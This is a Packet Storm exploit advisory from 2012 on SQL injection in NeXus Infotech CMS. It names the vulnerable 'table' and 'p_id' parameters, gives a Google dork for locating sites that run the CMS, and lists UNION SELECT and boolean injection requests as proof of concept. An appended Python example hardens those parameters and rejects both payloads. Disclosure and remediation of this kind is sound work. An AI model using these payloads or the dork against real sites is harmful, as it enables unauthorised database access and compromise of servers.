NeXus Infotech CMS SQL Injection

2012-05-07T00:00:00
ID PACKETSTORM:112498
Type packetstorm
Reporter gr00ve_hack3r
Modified 2012-05-07T00:00:00

Description

                                        
`# Exploit title : NeXus Infotech CMS SQL Injection Vulnerability  
# Date : May 05,2012  
# Author : gr00ve_hack3r  
# Contact : groove.hacker7/a/t/gmail.com  
# Homepage : www.gr00ve-hack3r.com  
# Vendor : NeXus Infotech  
# Vendor Site : http://www.nexusinfotech.org/  
# Google Dork : intext:"Powered By NeXus Infotech"  
  
# Vulnerability :  
  
The GET parameters "table" and "p_id" accept unsanitised user input,  
resulting in SQL injection, which can lead to server compromise.  
  
# PoC Exploit :  
  
[+] http://[host].com/index.php?pagename=photogallery&table=photogallery  
UNION ALL SELECT 1, 1, CONCAT(CHAR(1),CHAR(1),CHAR(1))#  
[+] http://www.[host].com/details.asp?p_id=1 AND 2=2  
`
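An added example, not code from the advisory or from the vendor: one way to handle the two parameters named above, with an allow-list for the `table` identifier (identifiers cannot be bound) and a bound integer for `p_id`. The sqlite3 schema, table and column names, and function names are assumptions constructed for illustration; the CMS's own code is not on the page.

```python
import sqlite3

# Assumption: tables a public page may read (names constructed for this example).
ALLOWED_TABLES = {"photogallery", "news"}

def build_db():
    """Constructed in-memory stand-in for the CMS database."""
    db = sqlite3.connect(":memory:")
    db.executescript(
        "CREATE TABLE photogallery (p_id INTEGER PRIMARY KEY, title TEXT);"
        "CREATE TABLE news (p_id INTEGER PRIMARY KEY, title TEXT);"
        "INSERT INTO photogallery VALUES (1, 'Opening day'), (2, 'Team');"
    )
    return db

def validate_table(raw):
    """SQL identifiers cannot be passed as bound parameters, so the only
    safe option is an exact match against a fixed allow-list."""
    if raw not in ALLOWED_TABLES:
        raise ValueError("table not allowed")
    return raw

def validate_p_id(raw):
    """Accept only a short run of ASCII digits; reject everything else."""
    if not (raw.isascii() and raw.isdigit()) or len(raw) > 9:
        raise ValueError("p_id must be numeric")
    return int(raw)

def fetch_items(db, table, p_id=None):
    """Hardened lookup: allow-listed identifier plus a bound value."""
    name = validate_table(table)
    sql = f'SELECT p_id, title FROM "{name}"'
    args = ()
    if p_id is not None:
        sql += " WHERE p_id = ?"          # the value travels separately from the SQL text
        args = (validate_p_id(p_id),)
    return db.execute(sql + " ORDER BY p_id", args).fetchall()

if __name__ == "__main__":
    db = build_db()
    print(fetch_items(db, "photogallery", "2"))
    # The two request values from the advisory are rejected before any SQL runs.
    for table, p_id in (("photogallery UNION ALL SELECT 1, 1, CONCAT(CHAR(1),CHAR(1),CHAR(1))#", None),
                        ("photogallery", "1 AND 2=2")):
        try:
            fetch_items(db, table, p_id)
        except ValueError as exc:
            print("rejected:", exc)
```

Rejections raised by `validate_table` and `validate_p_id` are also a useful logging point, since legitimate navigation never produces them.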